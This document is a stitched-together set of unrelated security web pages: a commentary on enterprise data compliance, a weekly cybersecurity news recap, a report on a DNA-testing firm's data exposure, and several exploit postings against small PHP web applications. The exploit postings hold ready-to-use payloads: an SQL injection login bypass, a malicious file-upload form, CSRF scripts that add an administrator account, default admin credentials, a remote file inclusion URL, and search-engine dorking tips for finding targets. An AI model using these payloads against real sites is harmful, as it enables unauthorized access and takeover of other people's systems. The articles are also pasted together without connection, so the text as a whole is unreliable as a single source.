By combining agility with compliance, and security with accessibility, businesses will treat their data as a well-prepared traveler, ready for any adventure.

Source: Lucie Konecna via Alamy Stock Photo

COMMENTARY

The post-pandemic need for "anywhere connection" is fueling not only borderless business but also the rise of digital nomads. Surprisingly, the two face similar issues.

Consider that both international enterprises and location-independent workers must be prepared for travel, follow local rules, and carry only the essentials. For a digital nomad, this might mean a laptop, a handful of essential apps, and a reliable VPN. For an enterprise and its data, it's multicloud databases, robust encryption, and a zero-trust posture. In both cases, excess baggage only slows you down and increases vulnerability. And, in both cases, not following the rules can result in legal headaches.

Indeed, enterprises today walk a data tightrope. Their information ecosystems must be adaptable across diverse environments, navigating tightening regulations, heightened security requirements, and complex data rules.

Let's explore how enterprises can become data nomads by balancing compliance, security, and agility — all while seeing the world without getting in trouble.

**From Home Bases to Global Expeditions**

Mastering travel is crucial for digital and data nomads. Like savvy travelers navigating international borders, enterprises must maneuver a varied data landscape — especially with the likes of the European Union's General Data Protection Regulation (GDPR) acting as a stringent "passport control" for information. Therefore, understanding what's required is key to moving data from point A to B while abiding by the law.

Enterprises must first map their data — their digital luggage — to know what they have, how it's regulated, and where it's stored. Like nomads with a home base, many adopt a hybrid cloud approach. This home-and-away strategy blends on-premises infrastructure with public cloud services, offering flexibility, cost benefits, and resilience. It ensures data resides in jurisdictionally appropriate locations while enabling global reach. 

However, moving data between specific regions brings additional complications, especially between Europe and the US. For years, the "visa requirements" governing acceptable data transfers between these two superpowers have been in flux, with the EU-US Data Privacy Framework being the latest attempt to streamline cross-border data. Organizations still need to secure the right "travel permits" with a combination of approaches. This might involve keeping sensitive data in EU-based systems, using standard contractual clauses for US transfers, or applying new framework principles where relevant. However, given the turbulent history of previous agreements like Privacy Shield and Safe Harbour, enterprises should watch this space.

Another way to travel without falling afoul of the authorities is isolated connectivity. Google's Distributed Cloud latest configuration exemplifies this balance, with its air-gapped appliance allowing users to access cloud applications without jeopardizing data security — a blend of home comfort and travel flexibility for enterprise data.

**A Nomad's Security Toolkit**

But moving from place to place exposes both digital and data nomads to security risks. Just as globe-trotting workers must stay vigilant against pickpockets and scams, enterprises must be wary of bad actors — a growing concern with the rise of distributed workloads and global hackers.

The good news is that enterprises can and must fight back. End-to-end encryption acts like an unbreakable luggage lock, protecting information at every step. Multifactor authentication serves as a biometric passport, ensuring only authorized personnel gain access. Regular security audits flag potential risks, much like travel advisories. And, by embracing distributed storage, companies avoid keeping all their eggs in one basket, reducing the impact of any single breach.

Adopting a zero-trust architecture — comparable to a cautious security detail — further ensures verification regardless of origin. This "trust nothing, verify always" mindset treats every network as hostile and scrutinizes each access request, thereby reducing the risk of data breaches and unauthorized access.

**Lessons From the Road**

By now I've done this metaphor to death, but the parallels between digital nomads and enterprise data are too striking to ignore — and the challenges will only continue to evolve.

Emerging technologies like edge computing and AI will create new destinations for our data to explore. And don't expect regulations to slow down, further shaping digital travel requirements. This demands IT leaders have their finger on the pulse and think about their data journey from door to door.

The most successful enterprises will be those that can turn potential data pitfalls into opportunities for growth and innovation. By combining agility with compliance, and security with accessibility, they will treat their data as a well-prepared traveler, ready for any adventure.

The lesson from our digital nomad cousins is clear: Pack light, comply right.

**About the Author**

Founder & CEO, Hexnode

Apu Pavithran is the founder and CEO of Hexnode. Recognized in the IT management community as a consultant, speaker, and thought leader, Apu has been a strong advocate for IT governance and information security management.

Treat Your Enterprise Data Like a Digital Nomad

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

**Student Management System 1.0 Insecure Cookie Handling**

Posted Sep 30, 2024

Authored by indoushka

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling

SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba

Download | Favorite | View

**Student Management System 1.0 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,997)
*   Arbitrary (17,113)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,047)
*   Code Execution (7,925)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,434)
*   DoS (25,304)
*   Encryption (2,395)
*   Exploit (54,342)
*   File Inclusion (4,278)
*   File Upload (1,022)
*   Firewall (822)
*   Info Disclosure (2,924)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,310)
*   Local (14,864)
*   Magazine (587)
*   Overflow (13,228)
*   Perl (1,435)
*   PHP (5,284)
*   Proof of Concept (2,413)
*   Protocol (3,751)
*   Python (1,662)
*   Remote (31,922)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,052)
*   Shell (3,308)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,738)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,133)
*   Web (10,144)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,306)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,130)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,374)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,912)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,882)
*   UNIX (9,461)
*   UnixWare (188)
*   Windows (6,780)
*   Other

Student Management System 1.0 Insecure Cookie Handling

Student Enrollment version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Student Enrollment v1.0 Remote File Upload Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/06/Student_Enrollment_In_PHP_With_Source_Code.zip                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] use payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Upload Profile Photo</title>  
</head>  
<body>  
    <h2>Upload Profile Photo</h2>  
    <form action="http://127.0.0.1/student-php-enroolment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">  
        <label for="userphoto">Select Photo:</label>  
        <input type="file" id="userphoto" name="userphoto" required><br><br>

        <button type="submit" name="upphoto">Upload Photo</button>  
    </form>  
</body>  
</html>

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] save code as poc.html 

[+] Link to the uploaded files : admin/index.php?page=user-profile

[+] path : http://127.0.0.1/student-php-enroolment/admin/images/ evli.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Student Enrollment 1.0 Arbitrary File Upload

Sistem Penyewaan Baju atau Pakaian Berbasis Web version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Sistem Penyewaan Baju atau Pakaian Berbasis Web v1.0 Auth By Pass Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://shopee.co.id/Aplikasi-Sistem-Penyewaan-Baju-atau-Pakaian-Berbasis-Web-i.95672618.9716246272                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/batarisalononline/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sistem Penyewaan Baju atau Pakaian Berbasis Web 1.0 SQL Injection

Simple Student Quarterly Result / Grade System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Student Quarterly Result / Grade System v1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Student Quarterly Result / Grade System 1.0 Insecure Settings

Simple Responsive Tourism Website version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Simple Responsive Tourism Website v1.0 CSRF Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/tourism/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-ycrs\/tourism\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Responsive Tourism Website 1.0 Cross Site Request Forgery

Simple Music Management System version 1.0 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : Simple Music Management System v1.0 CSRF Add ADmin Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code                          |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code add new admin .

[+] Go to the line 35.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/music/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Music Management System 1.0 Add Administrator / Cross Site Request Forgery

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 30, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 9eb4f98f6b5aa7c6a2b152f6a928201fce3e01efc03aed42ffeb58be9416ad69

Download | Favorite | View

**Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 XSS Vulnerability                                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/blog/index.php?id=2&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 Cross Site Scripting / Remote File Inclusion

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.
But it wasn't all good news – Kaspersky's forced exit from the US market left users with more

Cybersecurity / Weekly Recap

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.

But it wasn't all good news – Kaspersky's forced exit from the US market left users with more questions than answers. And don't even get us started on the Kia cars that could've been hijacked with just a license plate!

Let's unpack these stories and more, and arm ourselves with the knowledge to stay safe in this ever-evolving digital landscape.

****⚡ Threat of the Week****

**Flaws Found in CUPS:** A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions. Red Hat Enterprise Linux tagged the issues as Important in severity, given that the real-world impact is likely to be low due to the prerequisites necessary to pull off a successful exploit.

****🔔 Top News****

*   **Google's Touts Shift to Rust:** The pivot to memory-safe languages such as Rust for Android has led to the percentage of memory-safe vulnerabilities discovered in Android dropping from 76% to 24% over a period of six years. The development comes as Google and Arm's increased collaboration has made it possible to flag multiple shortcomings and elevate the overall security of the GPU software/firmware stack across the Android ecosystem.
*   **Kaspersky Exits U.S. Market:** Russian cybersecurity vendor Kaspersky, which has been banned from selling its products in the U.S. due to national security concerns, raised concerns after some found that their installations have been automatically removed and replaced by antivirus software from a lesser-known company called UltraAV. Kaspersky said it began notifying customers of the transition earlier this month, but it appears that it was not made clear that the software would be forcefully migrated without requiring any user action. Pango, which owns UltraUV, said users also had the option of canceling their subscription directly with Kaspersky's customer service team.
*   **Kia Cars Could Be Remotely Controlled with Just License Plates:** A set of now patched vulnerabilities in Kia vehicles that could have allowed remote control over key functions simply by using only a license plate. They could also let attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address. There is no evidence that these vulnerabilities were ever exploited in the wild.
*   **U.S. Sanctions Cryptex and PM2BTC:** The U.S. government sanctioned two cryptocurrency exchanges Cryptex and PM2BTC for allegedly facilitating the laundering of cryptocurrencies possibly obtained through cybercrime. In tandem, an indictment was unsealed against a Russian national, Sergey Sergeevich Ivanov, for his purported involvement in the operation of several money laundering services that were offered to cybercriminals.
*   **3 Iranian Hackers Charged:** In yet another law enforcement action, the U.S. government charged three Iranian nationals, Masoud Jalili, Seyyed Ali Aghamiri, and Yasar (Yaser) Balaghi, who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data in an attempt to interfere with the upcoming elections. Iran has called the allegations baseless.

****📰 Around the Cyber World****

*   **Mysterious Internet Noise Storms Detailed:** Threat intelligence firm GreyNoise said it has been tracking large waves of "Noise Storms" containing spoofed internet traffic comprising TCP connections and ICMP packets since January 2020, although the exact origins and its intended purpose remain unknown. An intriguing aspect of the inexplicable phenomenon is the presence of a "LOVE" ASCII string in the generated ICMP packets, reinforcing the hypothesis that it could be used as a covert communications channel. "Millions of spoofed IPs are flooding key internet providers like Cogent and Lumen while strategically avoiding AWS — suggesting a sophisticated, potentially organized actor with a clear agenda," it said. "Although traffic appears to originate from Brazil, deeper connections to Chinese platforms like QQ, WeChat, and WePay raise the possibility of deliberate obfuscation, complicating efforts to trace the true source and purpose."
*   **Tails and Tor Merge Operations:** The Tor Project, the non-profit that maintains software for the Tor (The Onion Router) anonymity network, is joining forces with Tails (short for The Amnesic Incognito Live System), the maker of a portable Linux-based operating system that uses Tor. "Incorporating Tails into the Tor Project's structure allows for easier collaboration, better sustainability, reduced overhead, and expanded training and outreach programs to counter a larger number of digital threats," the organizations said. The move "feels like coming home," intrigeri, Tails OS team lead said.
*   **NIST Proposes New Password Rules:** The U.S. National Institute of Standards and Technology (NIST) has outlined new guidelines that suggest credential service providers (CSPs) stop recommending passwords using several character types and stop mandating periodic password changes unless the authenticator has been compromised. Other notable recommendations include passwords should be anywhere between 15 and 64 characters long, as well as ASCII and Unicode characters should be allowed when setting them.
*   **PKfail More Broader Than Previously Thought:** A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has been now found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines. Binarly has described PKfail as a "great example of a supply chain security failure impacting the entire industry."
*   **Microsoft Revamps Recall:** When Microsoft released its AI-powered feature Recall in May 2024, it was met with near instantaneous backlash over privacy and security concerns, and for making it easier for threat actors to steal sensitive data. The company subsequently delayed a wider rollout pending under-the-hood changes to ensure that the issues were addressed. As part of the new updates, Recall is no longer enabled by default and can be uninstalled by users. It also moves all of the screenshot processing to a Virtualization-based Security (VBS) Enclave. Furthermore, the company said it engaged an unnamed third-party security vendor to perform an independent security design review and penetration test.

**🔥 **Cybersecurity Resources & Insights****

*   **Upcoming Webinars**
    *   **Overloaded with Logs? Let's Fix Your SIEM:** Legacy SIEMs are overwhelmed. The answer isn't more data... It's better oversight. Join Zuri Cortez and Seth Geftic as they break down how we went from data overload to security simplicity without sacrificing performance. Save your seat today and simplify your security game with our Managed SIEM.
    *   **Strategies to Defeat Ransomware in 2024**: Ransomware attacks are up by 17.8%, and ransom payouts are reaching all-time highs. Is your organization prepared for the escalating ransomware threat? Join us for an exclusive webinar where Emily Laufer, Director of Product Marketing at Zscaler, will unveil insights from the Zscaler ThreatLabz 2024 Ransomware Report. Register now and secure your spot!
*   **Ask the Expert**
    *   **Q:** How can organizations secure device firmware against vulnerabilities like PKfail, and what technologies or practices should they prioritize?
    *   **A:** Securing firmware isn't just about patching—it's about protecting the very core of your devices where threats like PKfail hide in plain sight. Think of firmware as the foundation of a skyscraper; if it's weak, the entire structure is at risk. Organizations should prioritize implementing secure boot mechanisms to ensure only trusted firmware loads, use firmware vulnerability scanning tools to detect and address issues proactively, and deploy runtime protections to monitor for malicious activities. Partnering closely with hardware vendors for timely updates, adopting a zero-trust security model, and educating employees about firmware risks are also crucial. In today's cyber landscape, safeguarding the firmware layer is essential—it's the bedrock of your entire security strategy.

****🔒 Tip of the Week****

**Prevent Data Leaks to AI Services:** Protect sensitive data by enforcing strict policies against sharing with external AI platforms, deploying DLP tools to block confidential transmissions, restricting access to unauthorized AI tools, training employees on the risks, and using secure, in-house AI solutions.

****Conclusion****

Until next time, remember, cybersecurity is not a sprint, it's a marathon. Stay vigilant, stay informed, and most importantly, stay safe in this ever-evolving digital world. Together, we can build a more secure online future.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 23-29)

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress…

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress folder. Privacy concerns highlight the need for stronger data protection.

An Indiana-based genetic DNA testing and facial matching service provider exposed thousands of customers’ personal, biometric, and PII data. This incident was reported to Hackread.com by cybersecurity researcher Jeremiah Fowler, known for identifying and reporting misconfigured databases to companies before malicious actors exploit them.

The problematic aspect of this incident is that there was no misconfigured database or a compromised cloud server this time. It was just an unsecure WordPress folder hosting a treasure trove of sensitive data left for public access without any password or security authentication.

The exposed data comprised around 8,000 documents. It included biometric images, names, phone numbers, email addresses, racial or ethnic identities, and personal notes detailing reasons for seeking facial DNA analysis. The exposed information also includes records of vulnerable individuals, including newborn children.

These records were stored in a non-secure WordPress folder titled “Facial Recognition Uploads,” accessible to anyone with a web browser. The exposure lasted for an unknown duration, raising concerns about the potential misuse of this sensitive information.

In his report for vpnMentor shared with Hackread.com ahead of publishing, Fowler explained that Biometric data, such as facial recognition information, is highly sensitive and can be used to identify individuals, track their movements, and even manipulate their identities through deepfakes. Collecting, storing, and analyzing such data without explicit consent is a serious violation of individual privacy.

Metadata, the information that describes, organizes, and manages data, can also pose significant risks. In this case, the exposed metadata included personally identifiable information (PII) such as names, emails, and phone numbers. This information could be exploited for phishing, social engineering, or blackmail attempts.

For your information, ChoiceDNA is an Indiana-based company that offers DNA testing and facial recognition service called FACE IT DNA It uses facial comparison technology to analyze images to determine the likelihood of a genetic link between family members. The BASIC package is $38, while the PRO package is $63. 

Fowler sent the company a responsible disclosure notice after which the database was promptly secured. Still, such incidents show the importance of secure data storage practices. WordPress, while a popular content management system, can be vulnerable if not configured correctly. The exposed data in this case was stored in a non-secure WordPress folder, highlighting the need for robust security measures to protect sensitive information.

Companies and users/customers with known data exposure should immediately change passwords and avoid reusing the same passwords for multiple accounts. Create strong, unique passwords for each account and enable two-factor authentication (2FA) as an additional layer of security.

Be cautious when exposing emails and phone numbers, as potential phishing attempts or suspicious requests for additional information can occur. Verify requests for sensitive information, such as banking or credit card information, to ensure the person on the other end and the request are legitimate.

1.  Data of 7 Million 23andMe Users from DNA Service Hacked
2.  Researchers Encode Physical DNA with Malware to Infect PC
3.  DNA testing website MyHeritage hacked; 92M user accounts stolen

Tag

#auth